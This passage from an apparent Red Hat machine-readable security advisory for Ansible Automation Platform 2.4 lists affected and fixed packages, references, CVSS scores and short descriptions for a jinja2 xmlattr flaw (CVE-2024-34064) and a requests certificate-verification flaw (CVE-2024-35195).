"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34064"
},
{
"category": "external",
"summary": "RHBZ#2279476",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279476"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj",
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"
}
],
"release_date": "2024-05-06T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "workaround",
"details": "Do not accept user input as keys to the xmlattr filter without validation. See the statement above for more information.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jinja2: accepts keys containing non-attribute characters"
},
{
"cve": "CVE-2024-35195",
"cwe": {
"id": "CWE-670",
"name": "Always-Incorrect Control Flow Implementation"
},
"discovery_date": "2024-05-21T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2282114"
}
],
"notes": [
{
"category": "description",
"text": "An incorrect control flow implementation vulnerability was found in Requests. If the first request in a session is made with verify=False, all subsequent requests to the same host will continue to ignore cert verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "requests: subsequent requests to the same host ignore cert verification",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
